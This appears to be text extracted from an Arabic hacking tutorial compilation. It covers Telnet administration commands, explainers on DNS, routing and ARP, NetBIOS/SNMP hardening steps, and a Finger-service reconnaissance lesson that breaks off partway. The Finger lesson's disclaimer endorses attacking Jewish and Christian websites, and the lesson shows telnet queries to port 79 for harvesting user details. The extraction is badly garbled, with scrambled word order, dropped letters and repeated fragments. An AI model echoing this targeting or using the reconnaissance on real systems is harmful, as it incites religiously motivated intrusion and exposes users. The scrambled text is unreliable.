‬‬ ‫‪synch‬‬ ‫أداء عملية تزامن ‪.‬‬ ‫‪ao‬‬ ‫إحباط أمر الخراج‪.‬‬ ‫‪ip‬‬ ‫مقاطعة أمر العملية‪.‬‬ ‫ملحظات‬ ‫يمكنك اختصار هذا المر إلى ‪.c‬‬ ‫أمثلة‬ ‫لقطع التصال من ملقم بعيد ‪ ،Redmond‬اكتب‪:‬‬ ‫‪c redmond 44‬‬ ‫لرسال أوامر عميل ‪Telnet‬‬ ‫بناء الجملة‬ ‫‪[?] [send [\\RemoteServer] [ao] [ayt] [esc] [ip] [synch‬‬ ‫المعلمات‬ ‫\\ ‪RemoteServer‬‬ ‫تحديد اسم الملقم الذي تريد إدارته‪ ."?Are you there‬‬ ‫‪esc‬‬ ‫إرسال حرف الهروب الحالي‪.‬‬ ‫‪ayt‬‬ ‫إرسال أمر "‪.‬إن لم تحدد ملقمًا ما‪ ،‬سيتم افتراض الملقم المحلي‪.Telnet‬‬ ‫لعرض العدادات الحالية لعميل ‪Telnet‬‬ ‫‪46‬‬ .‬إن لم تحدد ملقمًا ما‪ ،‬سيتم افتراض الملقم المحلي‪.‫\\ ‪RemoteServer‬‬ ‫تحديد اسم الملقم الذي تريد إدارته‪ .

[+CTRL‬للعودة إلى جلسة عمل ‪ ،Telnet‬اضغط ‪.Telnet‬‬ ‫‪continue‬‬ ‫استئناف ملقم ‪.ENTER‬‬ ‫إدارة ملقم التلنت المحلي بالـ ‪tlntadmn‬‬ ‫لدارة كمبيوتر يشغل ملقم ‪Telnet‬‬ ‫بناء الجملة‬ ‫‪[tlntadmn [\\RemoteServer] [start] [stop] [pause] [continue‬‬ ‫المعلمات‬ ‫\\ ‪RemoteServer‬‬ ‫تحديد اسم الملقم الذي تريد إدارته‪ .2000‬ل يمكنك‬ ‫‪47‬‬ .‫بناء الجملة‬ ‫‪display‬‬ ‫المعلمات‬ ‫بل‬ ‫ملحظات‬ ‫يسرد المر ‪ display‬معلمات التشغيل الحالية لعميل ‪ .Telnet‬‬ ‫‪pause‬‬ ‫مقاطعة ملقم ‪.Telnet‬إذا كنت في جلسة عمل ‪) Telnet‬بعبارة‬ ‫ل بملقم ‪ ،(Telnet‬يمكنك الخروج من جلسة عمل ‪ Telnet‬لتعديل المعلمات بضغط‬ ‫أخرى‪ ،‬إذا كنت متص ً‬ ‫‪ .‬إن لم تحدد ملقمًا ما‪ ،‬سيتم افتراض الملقم المحلي‪.Telnet‬‬ ‫ملحظات‬ ‫ل من جهازي‬ ‫يمكنك إدارة كمبيوتر عن بعد يشغل ملقم ‪ Telnet‬باستخدام الوامر ‪ tlntadmn‬إذا كان ك ً‬ ‫الكمبيوتر يشغلن نفس نظام التشغيل فإذا المطلوب ويندوز ‪ 2000‬استخدمه بي ويندوز ‪ .‬‬ ‫‪start‬‬ ‫بدء تشغيل ملقم ‪.Telnet‬‬ ‫‪stop‬‬ ‫إيقاف تشغيل ملقم ‪.

‬‬ ‫لتعيين العدد العظمي لمحاولت تسجيل الدخول الفاشلة على كمبيوتر يشغل ملقم ‪Telnet‬‬ ‫بناء الجملة‬ ‫‪[tlntadmn [\\RemoteServer] config [maxfail=PositiveInteger‬‬ ‫المعلمات‬ ‫\\ ‪RemoteServer‬‬ ‫تحديد اسم الملقم الذي تريد إدارته‪ .‬‬ ‫‪maxfail=PositiveInteger‬‬ ‫تعيين الحد القصى لمحاولت تسجيل الدخول الفاشلة المسموح بها للمستخدم‪ .‬‬ ‫كمبيوتر يشغل ‪ Windows XP‬مث ً‬ ‫لتعيين الحد القصى لعدد التصالت على كمبيوتر يشغل ملقم ‪Telnet‬‬ ‫بناء الجملة‬ ‫‪[tlntadmn [\\RemoteServer] config [maxconn=PositiveInteger‬‬ ‫المعلمات‬ ‫\\ ‪RemoteServer‬‬ ‫تحديد اسم الملقم الذي تريد إدارته‪ .‫استخدام الوامر ‪ tlntadmn‬لدارة كمبيوتر عن بعد يشغل ‪ Windows 2000‬وملقم ‪ Telnet‬من‬ ‫ل‪.‬‬ ‫‪maxconn=PositiveInteger‬‬ ‫تعيين العدد العظمي للتصالت‪ .100‬‬ ‫لتعيين المهلة من أجل خمول جلسات العمل على كمبيوتر يشغل ملقم ‪Telnet‬‬ ‫بناء الجملة‬ ‫‪[tlntadmn [\\RemoteServer] config [timeout=hh:mm:ss‬‬ ‫المعلمات‬ ‫\\ ‪RemoteServer‬‬ ‫‪48‬‬ .‬يجب عليك تحديد هذا العدد‬ ‫بواسطة عدد صحيح موجب أصغر من ‪.‬يجب عليك تحديد هذا العدد بواسطة عدد صحيح موجب أصغر من ‪10‬‬ ‫مليين‪.‬إن لم تحدد ملقمًا ما‪ ،‬سيتم افتراض الملقم المحلي‪.‬إن لم تحدد ملقمًا ما‪ ،‬سيتم افتراض الملقم المحلي‪.

..‬الخ‬ ‫الهكر الحقيقى هو تعلم نظم التشغيل مثل اللينكس و اليونكس و تعلم لغات تصميم المواقع بجانب بعض لغات‬ ‫البرمجه التى يكون اهمها فى مجالنا هى لغه السى ‪C‬‬ ‫و الن دعونا من كل هذه الخلبيط و لنبدأ التكلم فى المفيد‪:‬‬ ‫نحن فى بعض الحيان نسمع عن اشياء كثيره و لكن ل نعرف ما هى و ل نحاول ان نكتشف و نعرف ما هى‬ ‫و فى هذا الملف سوف نتكلم عن شئ نسمع عنه كثيرا و لكن معظمنا ل يعرف‬ ‫ما هو ‪:‬‬ ‫و هذا الشئ هو ال ‪:DNS‬‬ ‫و سوف نبدأ بالتحدث عن هذا السم الذى يسمعه الكثيرين و لكن ل يعرفون ما هو ‪:‬‬ ‫و لنبدأ بالسؤال نفسه‬ ‫==================================================‬ ‫=========================‬ ‫ما هو ال ‪?DNS‬‬ ‫‪49‬‬ ...‬إن لم تحدد ملقمًا ما‪ ،‬سيتم افتراض الملقم المحلي‪.‬‬ ‫انتهى‪،،،‬‬ ‫" معلومات عن الـ ‪" DNS‬‬ ‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪< Dark Devil :‬‬ ‫قبل ان نبدأ دعونا نعقد اتفاق معا ‪:‬‬ ‫فلننسا كلمه هكر و لنبدأ فى تعلم الشياء التى توصلنا لكلمه هكر بمعنى الكلمه و طبعا الهكر ليس معنا‬ ‫تروجن هورسس او سب سفن ‪.‫تحديد اسم الملقم الذي تريد إدارته‪ .‬‬ ‫دائمًا يستخدم الـ ?‪ /‬لعرض التعليمات في موجه الوامر‪..‬‬ ‫‪timeout=hh:mm:ss‬‬ ‫تعيين فترة المهلة بالساعات‪ ،‬والدقائق‪ ،‬والثواني‪.

burn.0.com‬فسيسئل المتصفح اقرب ‪ DNS‬موجود له )و هذا يعتمد على اتصالك‬ ‫بالشبكه و رقم الى بى الخاص بك( عن عنوان ال ‪ IP‬ل ‪/http://www.burn. address resolution‬و لكن قد ظهر ال ‪ DNS‬لجعل‬ ‫توزيع الهوستس اسهل بكثير من الماضى حيث انه من‬ ‫السهل ان تتذكر اسم موقع معين تريده افضل من ان تتذكر اربعه خانات من الرقام )‪.0. UNIX‬‬ ‫و يتكون برنامج ال ‪ DNS‬من جزئين ‪:‬‬ ‫‪ (the name server itself (the daemon program that listens to port 53‬و الخر‬ ‫يسمى ‪RESOLVER‬‬ ‫و ال ‪ NAME SERVER‬هذا يستجيب الى متصفحك عندما تطلب معلومه معينه فمثل عندما تفتح‬ ‫النترنت اكسبلورر و تكتب او تطلب منه موقه معين مثل‬ ‫‪ /http://www.1‬و‬ ‫العكس صحيح و عندما تتم العمليه‬ ‫تتصل بالموقع مباشره‬ ‫و عمليه التحويل هذه تسمى ‪ address resolution‬اى تحويل او تحليل عنوان الموقع الى ‪ IP‬او‬ ‫العكس لنستطيع التصال به‬ ‫و قبل ظهور ال ‪ DNS‬كان اسم اخر لعمليه ال ‪.‫==============‬ ‫اول ‪ DNS :‬هو اختصار لكلمه ‪ .com :‬الى ‪ IP ADRESSES‬مثل ‪ 127.SRI-NIC‬‬ ‫و طبعا مع تطور النترنت الرهيب و السريع بدأ هذا النظام فى الفشل و بدأو يبحثون عن النظام المثل الذى‬ ‫يستطيع التحكم فى الهوست و الى بى‬ ‫معا فى وقت واحد و بسرعه و بترتب و دقه و طبعا ظهر ال ‪ DNS‬ليفعل ذلك‪.com‬‬ ‫لن المتصفح يحتاج هذا ال ‪ IP‬ليجد السرفر الذى لديه هذا الهوست اى هذا الموقع و يطلب محتويات الموقع‬ ‫من السرفر ليعرضها لك فى متصفحك‪.(Berkeley Internet Name Domain‬و يوجد ايضا‬ ‫برامج مثل هذه للويندوز و الماكنتوش ايضا‬ ‫اذا اراد احد استعمالهم ك ‪ DNS SERVER‬و لكن الكل يفضل ال ‪.‬‬ ‫و قبل هذا سيسئل ال ‪ daemon program‬فى جداوله اى فى ذاكره متصفحك عن الموقع الذى تطلبه‬ ‫فأذا لم يجده ينتقل الى ما سبق شرحه و هكذا تتم العمليه‪.burn.‬‬ ‫‪:THE TREE INFORMATION‬‬ ‫======================‬ ‫و الن اصدقائى بعد ان اتقفنا على انك عندما تطلب رقم ‪ IP‬معين من المتصفح حقك و ل يجده فى ال ‪DNS‬‬ ‫‪50‬‬ .(Network Information Center (SRI-NIC‬و كان على هذا الراعى ان‬ ‫يجدد )‪ (UPDATE‬الجدول هذا حوالى كل اسبوع و يمده بالعنواوين الجديده و الرقام التى ظهرت و على‬ ‫السيستم ادمين ان يجدد هو الخر ملفه او‬ ‫عن طريق اتصال ال ‪ FTP‬بينه و بين الراعى اى ‪.‬‬ ‫‪:THE DNS SERVER‬‬ ‫================‬ ‫ال ‪ DNS SERVER‬هو عباره عن كمبيوتر و يعمل عادتا على نظام ‪ UNIX‬او النظم الشبيهه باليونكس‬ ‫و يستخدم برنامج اليونكس ‪ BIND‬اى )‪ . (IP‬‬ ‫و كان السم المستعمل ل ال ‪ address resolution‬قبل ال ‪ DNS‬كان يتكون من ملف اسمه ال‬ ‫‪ HOST FILE‬و كان عباره عن اسماء الهوستس اى المواقع‬ ‫و عنواوين ال ‪ IP‬الخاصه بهم و كان هذا الملف تتولى رعايته ‪Stanford Research Institute's‬‬ ‫‪ .‬‬ ‫هذا بالنسبه لمعلومات عامه عن ال ‪ DNS‬و كيف كان النظام قبل اكتشافه و هى ايضا نظره عامه عن حركه‬ ‫النترنت القديمه ‪. Domain Name System‬و يتصل سرفر ال ‪ DNS‬عادتا على‬ ‫بورت ‪ 53‬مما يعنى انك اذا اردت التصال الى احد المواقع و استعملت ال ‪ DNS‬حقه فسوف تتصل‬ ‫به عن طريق البورت ‪ 53‬و سوف يترجم او يحول ال ‪ translates alphabetical hostnames‬و‬ ‫يعنى اسم الموقع مثل ‪ /http://www.‬‬ ‫و ال ‪ DNS‬ليس له مركز اى ‪ decentralized‬اى انه ليس هناك ماكينه او سيستم معين يتحكم فى كل‬ ‫ال ‪ DNS‬بل بالعكس فال ‪ DNS‬عباره عن داتا بيز‬ ‫موزعه بشكل منظم و توجد على كذا سرفر مختلف و كل سرفر عليه ‪ DNS‬يعرف اين يبحث عندما يريد ان‬ ‫يحصل على معلومه معينه او هوست معين‪.

‬‬ ‫انتهى‪،،،‬‬ ‫‪51‬‬ .ac.isp.uk‬الى ‪ some-organization.gov.co.‬اذا كان ال ‪ ISP‬الخاص بك يحنوى على ال ‪ IP‬الذى طلبته‬ ‫فسوف يحتاج فقط الى اجزاء من الثانيه ليأتى به لك و يعرضه فى متصفحك‪ .uk‬و الخ و هناك امثله كثيرا طبعا و كل‬ ‫شئ ينتهى ب ‪ UK‬و اذا لم يجده ايضا فى كل الماكن المتاح له البحث فيها فسيرجع المتصفح الى اكبر‬ ‫‪ DNS‬موجود على الشبكه و اسمه ال ‪ ROOT‬فهو يحتوى على كل عناوين ال ‪ IP‬على كل للمواقع‬ ‫الموجوده على اى ‪.uk‬او ‪school.DNS SERVERS‬‬ ‫و طبعا نتيجه من هذا التصال فنستنتج وجود شجره اتصال و معلومات و لكن كيف تعمل بالضبط‬ ‫دعونا نأخذ مثال ‪:‬‬ ‫لو فرضنا ان ال ‪ ISP‬الخاص بك كان مثل ‪ isp.uk.‬اما اذا انتقل المتصفح للبحث‬ ‫فى مستوى اعلى من ال ‪ DNS‬فسوف يحتاج الى قليل من الوقت يمتد حتى ‪ 15‬ثانيه ‪ .co.uk‬و الن فالنفرض انك سألت هذا ال ‪ DNS‬ليبحث لك عن ‪IP‬‬ ‫الخاص ب ‪ /http://www.edu.‬‬ ‫ارجو ان اكون قد افدتكم جميعا بهذه المعلومات التى هى بعيده عن الهكر و لكنها اساس فى تعلم الهكر يا‬ ‫اصدقائى و كما قلت لكم الهكر ليس التروجان و الباتشات الهكر هو تعلم اساليب البرمجه و كيفيه تصميم‬ ‫المواقع و معرفه كل شئ جديد فى عالم النترنت و ارجو من المحترفين الدخول و قرائه الموضوع و تصحيح‬ ‫الخطاء التى به حتى يكون موضوع كامل و متكامل خالى من الخطاء و نتظر ردودكم و تفاعلكم مع‬ ‫المعلومات و اى سؤال انا موجود على قد مقدرتى‬ ‫و انتظرو موضوعى القادم و هو معلومات عن ال ‪ SSL‬و سنعرف ما هو بالتفصيل‬ ‫و السلم عليكم و رحمه ال و بركاته‪.mil.co.uk.co.isp.burn.‬و فى حاله انه ل‬ ‫يجده سوف تأتيك رساله من متصفحك تقول ‪ address could not be found‬و هذا يحدث نتيجه‬ ‫اعطاء المتصفح ‪ HOST‬او ‪ IP‬خطأ ليبحث عنه و بالتالى طبعا فهو ليس موجود من الساس ليعرضه او‬ ‫نتيجه طول البحث فيقوم متصفحك بقدان التصال مع ال ‪ DNS‬اى عمليه ‪.uk‬بالبحث فى جداوله‬ ‫المحليه المخذنه فى الذاكره عنده فيجدها و اذا لم يجدها فسينتقل كما قلنا الى مستوى اعلى من ال ‪DNS‬‬ ‫‪ SERVER‬ليبحث فيه و اذا لم يجده ايضا فى المستوى العلى فعليه ان يقوم بتغيير مكان البحث كليا فمثل‬ ‫من ‪ dns.uk. england. airforce.uk‬و هذا يعتمد على اتصالك بالنترنت اى حسب‬ ‫الشركه و السرفر الذى تشبك عليه فمن الطبيعى طبعا ان يكون ال ‪ISP's DNS server's‬‬ ‫‪ hostname‬مثل هذا ‪ dns.com‬مثل فسيقوم هذا ال ‪ dns.‫المحلى اى الخاص بك سوف يسأل ال ‪ DNS SERVER‬العلى منه فى المستوى عنه ليجده و اذا لم يجده‬ ‫فى مستوى اعلى فينتقل للبحث فى مستوى اعلى و اعلى و هكذا يسير البحث من القل الى العلى فى‬ ‫مستويات ال ‪.DOMAIN NAME‬‬ ‫‪?When and why does DNS "hang" or fail‬‬ ‫======================================‬ ‫و يمكن ايضا لل ‪ DNS‬ان يكون بطئ او سريع ‪.isp.‬‬ ‫‪ university. TIMED OUT‬‬ ‫و فى هذه الحاله نضغط فى المتصفح على ‪ REFRESH‬او ‪ RELOAD‬طبعا حسب متصفحك ‪.org.

‬‬ ‫و فى سياق النترنت يوجد ثلث مظاهر من الروتنج وهم‪:‬‬ ‫‪Physical Address Determination-1‬‬ ‫‪Selection of inter-network gateways-2‬‬ ‫‪Symbolic and Numeric Addresses-3‬‬ ‫‪52‬‬ .Routing‬‬ ‫و الن دعونا نبدأ و اتمنى ان يعجبكم الموضوع و تستفيدون منه‪:‬‬ ‫‪:Routing in the Internet‬‬ ‫=========================‬ ‫‪!?what is routing‬‬ ‫الروتنج هو عباره عن تكنيك او ميكانزم الذى عن طريقه تنتقل المعلومات من كمبيوتر الى اخر او من‬ ‫هوست الى اخر‪.‫" معلومات عن ‪" Routing in the Internet‬‬ ‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪< Dark Devil :‬‬ ‫السلم عليكم و رحمه ال و بركاته‪:‬‬ ‫سوف نتكلم يا اصدقائى عن شئ مهم فى علم الشبكات و الكثير منكم على غير علم به و هذا الشئ هو ال‬ ‫‪.

17‬‬ ‫‪dynamic 20-53-52-43-00-00 213.131.65.‬و هذا يتم بنجاح و ببساطه عن طريق استخدام جدول سوف‬ ‫يوضح كيفيه تحويل ال ‪ ip‬الى ‪ .‬فمن الدرورى ان نغلف هذه‬ ‫الداتا الخاصه بال ‪ ip‬بأى أطار من اى صيغه تكون متصله بالنت ورك المحليه للجهاز او بالنت ورك المتصل‬ ‫بها الجهاز فى حالته الموجود عليها عند انتقال هذه الداتا‪.135.‬و تحديد المدخل الملئم و البورت لتفصيل داتا ال ‪ ip‬هذا ما نسميه روتنج اى ‪ routing‬و تتضمن‬ ‫ايضا داخل تبادل المعلومات بطرق معينه‪.238‬‬ ‫النترنت ادرس الموجود امامكم هذا هى عناوين كل الشبكات المتصله بجهازى بعد دخولى الى النترنت‬ ‫و ال ‪ Physical Address‬اعتقد انكم تلحظون انه ثابت ل يتغير و بهذا يمكننا ان نقول و نوضح لكم ان‬ ‫ال ‪ Physical Address‬هذا هو ال ‪ Mac Address‬اى رقم الجهاز نفسه الذى تتصل به النتوركس‬ ‫اثناء العمل و لذلك فقد قلت فى كلمى ان تحديد ال ‪ Physical Address‬مهم جدااا فى عمليه نقل‬ ‫معلومات او داتا ال ‪ ip‬لنه بدون ‪ Physical Address‬اذن فكيف ستتعرف الباكيدجس الموجوده فى ال‬ ‫‪ router‬على طريقها‪.64.9.‬‬ ‫و هذا مثال حى من جهازى على الجدول الذى يظهر بعد تنفيذ المر ‪:‬‬ ‫‪C:\WINDOWS>arp -a‬‬ ‫‪Interface: 62.102 on Interface 0x2‬‬ ‫‪Internet Address Physical Address Type‬‬ ‫‪dynamic 20-53-52-43-00-00 207.226.‬‬ ‫و الثالث من المذكور هو الذى يتضمن انتقال العنوان اى ال ‪ address translation‬من الشكل الكتابى‬ ‫الذى نعرفه و نستطيع التعرف عليه بسهوله و المقصود مثل عنوان المتصفح اى‬ ‫‪ /http://www.‬و لنجاح هذا النتقال فى ظل الغليف بهذا الطار من الدرورى ان نحدد ما يسمى بال‬ ‫‪ physical address‬لتجاه الكمبيوتر‪ .(local network address or physical address within the frame‬‬ ‫و الشئ الثانى من المذكور اعله مهم ايضا و درورى لن النترنت تتكون من عدد من النت وركس المحليه‬ ‫اى ‪ local networks‬مربوطه بواحد او كثير من المداخل اى ال ‪.2‬‬ ‫‪dynamic 20-53-52-43-00-00 213.‬و يتطلب هذا الغلف التضمين من ال عنوان النت‬ ‫ورك المحليه او العنوان الفيزيائى لهذا للشبكه مع الطار الذى يحيط بالبيانات اى )‪inclusion of a‬‬ ‫‪.gateways‬و هذه المداخل عموما‬ ‫تسمى بالروترس اى ال ‪.‬‬ ‫و للحصول على هذا الجدول و قرائته من الطبيعى ان يكون الكمبيوتر يستخدم بروتوكول معين للحصول على‬ ‫هذا الجدول و تحويل ال ‪ ip‬الى ‪ physical addresses‬و هذا البروتوكول يعرف بأسم ‪ ARP‬اى‬ ‫‪ Address Resolution Protocol‬اى بروتوكول تحليل الدرس و اعتقد اننا الن ادركنا و فهمنا‬ ‫معنى كلمه تحويل ال ‪ ip‬الى ‪ .46.‬‬ ‫و الن ندخل فى شرح عمليه تحديد ال ‪ Physical Address‬اى ‪:‬‬ ‫‪:Physical Address Determination‬‬ ‫===============================‬ ‫اذا كان يريد جهاز كمبيوتر ان ينقل ‪ ip data‬اذن فأنه يحتاج الى ان يغلف بأطار مخصص و تابع للنتورك‬ ‫المتصل الجهاز بها‪ .‬‬ ‫و ال ‪ type‬هذا مكتوب ‪ dynamic‬اى انه غير ثابت بمعنى انه يتغيير عند عمل ريستارت لكل مره فى‬ ‫الجهاز و لكنه يثبت اثناء العمل على النترنت ‪.burn.com‬الى ‪ ip‬اى الى اشياء رقميه معقده صعبه و تؤدى هذه المهمه عن طريق ال‬ ‫‪) DNS‬ارجو مراجعه موضوعى الول عن ال ‪ DNS‬للستفاده اكثر (‪.‬‬ ‫‪53‬‬ . routers‬احيانا يكون لها اتصالت فيزيائيه او بورتات مع الكثير من النت‬ ‫وركس ‪. physical addresses‬و يمكن ان نعرف هذا الجدول بأسم ‪ARP‬‬ ‫‪.131. cache‬‬ ‫و للحصول على الجدول نستخدم امر ‪ arp -a‬و فى اليونكس ايضا نستخدم نفس المر‪.‫و يعتبر الول فى هذه الشياء هو المهم عندما تنتقل داتا ال ‪ ip‬من الكمبيوتر‪. physical addresses‬فمثل هذا الجدول يحتوى على عناوين ال ‪ip‬‬ ‫للنتوركس و الدرس او العنوان المعروف لها ‪.

‫و هناك النوع الخر و هو ال ‪ static‬اى الثابت الذى ل يتغير "هذا فقط للتوضيح"‬ ‫اعتقد الن اننا فهمنا بمعنى بسيط ما هو الروتنج و ما هى ال ‪routers‬‬ ‫انتهى‪،،،‬‬ ‫" ‪" NETBIOS‬‬ ‫>ةةةةة ةة ةةةة ةةةة<‬ ‫بعد قراءة هذا الموضوع ستكون قادر على‬ ‫•‬ ‫•‬ ‫•‬ ‫صد الجلسات الخالية‬ ‫منع تعداد المستخدمين‬ ‫منع تعداد الـ ‪SNMP‬‬ ‫يوجد في العداد الفتراضي للويندوز اعتماد على ‪ NetBIOS‬وهي مشكلة كبيرة لصحاب الشبكات المهمة لن الـ‬ ‫‪ NetBIOS‬لها واجهات تداخل ‪ API‬تعيد وترجع معلومات حول الهدف من خلل المنفذ ‪ 139‬لـ ‪ ، TCP‬وفي الحالة‬ ‫الفتراضية يكون الوصول ممكن حتى من مجهولين الهوية ‪ ،‬وطبعا هذا يكون فيه خطرًا قد يكون كبير عند استخدامه من‬ ‫محترفين الولوج على أنظمة ‪NT‬‬ ‫تستطيع أن تلغي كل خدمات ‪ NetBIOS‬على جهاز ما عندما تجد أنها غير ظرورية لك ويكون ذلك من خصائص ‪ TCP/IP‬ثم من‬ ‫‪ Advanced‬ثم من التبويب ‪ WINS‬ثم تعلم على الخيار الواضح في المثال التالي‬ ‫‪54‬‬ .

.‬‬ ‫وتوجد أدوات رسومية شعبية كثيرة على النترنت للقيام بنفس العمل منها على سبيل المثال البرنامج ‪، Legion‬‬ ‫‪‬‬ ‫الحل المريح‬ ‫‪55‬‬ ..‬‬ ‫ولمشاهدة شرح ميسر من ‪...‬‬ ‫وتوجد بعض الدوات المتاحة على النترنت تقوم بنفس العمل بشكل احترافي منها هذه الداة المدعوه ‪ Nbtscan‬وهي أيضًا اداة سطر‬ ‫أوامر وتستطيع أن تحملها من ‪.‫ل مناسبًا وهى تدعى ‪ RestrictAnonymous‬وهي تحد بشكل كبير‬ ‫وإذا كانت هذه الخدمة مهمة لك فقد قدمت شركة مايكروسوفت ح ً‬ ‫من تسرب المعلومات عبر الوصلت المجهولة ‪ ،‬وتستطيع الوصول إليها من ‪ Administrative TOOLS‬ثم من ‪Local Security‬‬ ‫‪ policy‬ثم من النافذة نختار ‪ Local poicies‬ثم من ‪ security options‬ثم نعلم على الخيار الول ‪Additional restrictions‬‬ ‫‪ for anonymous connections‬ثم بالزر اليمن نختار ‪ security‬ثم من النافذة نختار من الشريط المنزلق الخيار ‪No Access‬‬ ‫‪ Without Explicit Anonymous Permissions‬مثل المثال‬ ‫بعض المثله لستخدام أدوات الـ ‪NetBIOS‬‬ ‫‪‬‬ ‫‪Net View‬‬ ‫هذه الداة مضمنه ضمن نظام التشغيل نفسه وهي أداة سطر اوامر على ‪ NT/W2000‬وهي تعرض الميادين المتاحة وكل الجهزة على‬ ‫هذه الميادين وكل الخدمات المتاحة لتشارك على الجهزة ‪ ،‬ويكفي أن تكتب عنوان ‪ IP‬أو اسم الدومين حتى تكون قد حصلت على ما‬ ‫تريد‬ ‫ولمعرفة المزيد عن إستخدامات المر ‪ Net‬في إدارة‬ ‫الشبكة انقر ‪.

‫الحل المريح لتخلص من هذا الصداع هو حماية المنافذ المقدمه من البروتوكول ‪ TCP‬و البروتوكول ‪ UDP‬عبر المنافذ من ‪ 135‬إلى‬ ‫المنفذ ‪ ، 445+ 139‬وكل برامج الجدران النارية المتقدمة تستطيع من خللها أن تتحكم بالمنافذ بشكل مريح ‪ ،‬وشاهدنا كيف نلغي‬ ‫الخدمة ‪ NetBIOS‬أو نقلل من المشاكل المحتمله منها ‪ ،‬ورغم كل ذلك لزال الخطر موجودًا إذا كنت تستخدم البروتوكول ‪SNMP‬‬ ‫لدارة الشبكة على ويندوز ‪ 2000‬سيرفر ‪ ،‬فهذا البروتوكول يمرر كل المعلومات المطلوبة إذا كان مثبتا ‪ ،‬ولتأمين هذا البروتوكول بالشكل‬ ‫المطلوب أمامك خيارين الول‬ ‫حذف اسم المجموعة ‪ Public‬التي تكون عند التثبيت الفتراضي وتكون أسماء مخصصة من مستخدمين الشبكة كما في المثال‬ ‫المجموعة ‪ public‬موجودة علم عليها ثم من الزر ‪ Remove‬ثم حرر المربع ‪Send authentication trap‬‬ ‫بذلك تكون قد حصرت استخدام هذا البروتوكول للشخاص المختارين فقط‬ ‫والحل الثاني من محرر السجل ‪regedit‬‬ ‫‪HKEY_LOCAL_MACHINE\system\currentControlset\serveces\SNMP\parameters\ExtensionAgent‬‬ ‫ل إ ذا كان ما حذفته رقمه = واحد أعد الترقيم‬ ‫ثم قم بحذف المفتاح ‪ LANManagerMIB2Agent‬ثم قم بإعادة ترقيم المدخلت مث ً‬ ‫ليبدأ من واحد للمدخل رقم ‪2‬‬ ‫هل تعلم أن‬ ‫البروتوكول ‪ TCP/IP‬يستطيع العمل بشكل سليم بدون خدمات الـ ‪ ، NetBIOS‬لذلك إذا كنت‬ ‫غير محتاج إليه تعطيله أفضل‬ ‫ةةةةةةةة‬ ‫‪56‬‬ .

3‬استخدام ‪Finger‬‬ ‫‪ 1.1‬تبرئة‬ ‫‪ 1.‬‬ ‫‪57‬‬ .‬‬ ‫المستخدم البعيد)‪ ( remote user‬يمكن أن يرسل طلب إلى ‪ Finger‬ديمون يجري على نظام معين‬ ‫)بورت ‪ Finger‬نوعية ‪ (79‬وسيحصل على إجابة‪.5‬الستعلم عن طريق موقع بأستخدام ‪Finger‬‬ ‫‪ 1.2‬مقدمة عن ‪Finger‬‬ ‫>===================<‬ ‫ن ‪ Finger‬ديمون خدمة تعمل عن طريق البورت ‪ 79‬عادة وكانت‬ ‫إّ‬ ‫مستخدمة أصل كنوع ‪ businesscard‬رقمي للناس‪.6‬الستنتاج من هذا الدرس‬ ‫‪ 1.‫" بروتوكول خدمة ‪"Finger‬‬ ‫>ةةةةة ةة ةةةةةةة ةةةة ةةةةة ةةةةةةةةة<‬ ‫>ةةةةةة‪<LAMeR :‬‬ ‫السلم عليكم ورحمة ال وبركاته‬ ‫اتمنى انكم تتقبلون مني هذا الدرس عن بروتوكول خدمة ‪ Finger‬التي تعمل على بورت ‪79‬‬ ‫بسم ال نبدأ الدرس‬ ‫فهرس محتويات الدرس‬ ‫>================<‬ ‫‪ 1.4‬بعض الخدع عند استخدام خدمة ‪Finger‬‬ ‫‪ 1.7‬الختام‬ ‫‪ 1.1‬تبرئة‪:‬‬ ‫>=========<‬ ‫هذا الدرس فقط للتعليم والتطبيق على مواقع اليهود والنصاري الضاره للمسلمين‬ ‫فالكاتب ل يتحمل اي مسؤولية للستخدام السيء لهذا الدرس ضد أخواننا المسلمين‪.2‬مقدمة عن ‪Finger‬‬ ‫‪ 1.‬‬ ‫هذه الجابة ستخبرك من هم المستخدمين على هذا النظام و أيضا‬ ‫بعض المعلومات عن هؤلء المستخدمين المتصلين بالنظام‪.‬‬ ‫‪ 1.

foobar.com‬ووجدت به منفذ )‪ Port‬بورت( ‪ 79‬مفتوحا‬ ‫هذا يعني ان ‪/http://www.‬وكان ‪ Finger‬يستخدم قديما في‬ ‫الجامعات و الشركات الكبيرة أيضا‪.‬في أغلب الحيان الجابة تخبرك أيضا من الذي يدير النظام)‪ (admin‬وكيف قام‬ ‫بالتصال‪.‬‬ ‫لهذا سوف أحاول ان اشرح في هذا الدرس بلغة مفهومة‬ ‫ما هو ‪ Finger‬ديمون وماذا يفعل وكيف يمكن استخدامه في مصلحتك‬ ‫الخلصة المقدمة‪ :‬ان خدمة ‪ Finger‬كانت قديما ولزالت تستخدم لجلب المعلومات عن‬ ‫المستخدمين الموجودين في النظام و هل لديهم حسابات في هذا النظام ام ل ‪.‬‬ ‫قديما استخدم الناس التصال على جميع انواع النظمة في العالم وطلب الستعلم عن هذه النظمة و الـ‬ ‫‪ Finger‬كان يعطيهم معلومات عن‬ ‫من هم الموجودون في النظام وهل لهم حسابات في هذا النظام‪.‬‬ ‫ملحظة ‪ :‬النظام) ‪ ( server‬هو جهاز كمبيوتر تخزن فيه معلومات هائلة ويستخدم في استضافة المواقع‬ ‫‪ 1.‬‬ ‫وهذه اليام يقوم الهكرز بمحاولت اختراق النظمة بأستخدام برامج‬ ‫ي أساس علمي ‪.foobar.‬‬ ‫الن كيف نقوم بـ)‪ (request‬طلب استعلم؟‬ ‫عن طريق وندوز‬ ‫في أغلب الحيان وندوز ل يوجدبه زبون )‪ (client‬خاص للـ ‪ Finger‬مركب ) ‪( installed‬‬ ‫لذلك سوف نستخدم ‪ Telnet‬كخادم لـ ‪Finger‬‬ ‫‪-‬توضيح‪--‬‬‫‪Telnet(client) --------request-------> Finger Deamon(in Server) o‬‬ ‫عن طريق كتابة السطر التي في موجة الدوس )‪: ( MS DOS‬‬ ‫‪telnet http://www.foobar. .com‬‬ ‫له ‪ Finger‬ديمون يعمل‪.‬‬ ‫‪ portscans‬للبحث عن البورتات المفتوحة‪ .‬بدون أ ّ‬ ‫ن ‪ Finger‬ديمون‪ ،‬مثال عظيم لخدمة‬ ‫لذلك إ ّ‬ ‫ساسة‬ ‫يمكن استخدامها قانونيا لتزودك بكمية ضخمة من المعلومات الح ّ‬ ‫حول هدف‪.com/ 79‬‬ ‫‪58‬‬ .3‬استخدام ‪Finger‬‬ ‫>=================<‬ ‫عند استخدام اي من برامج السكان المعروفة مثل )‪ ( 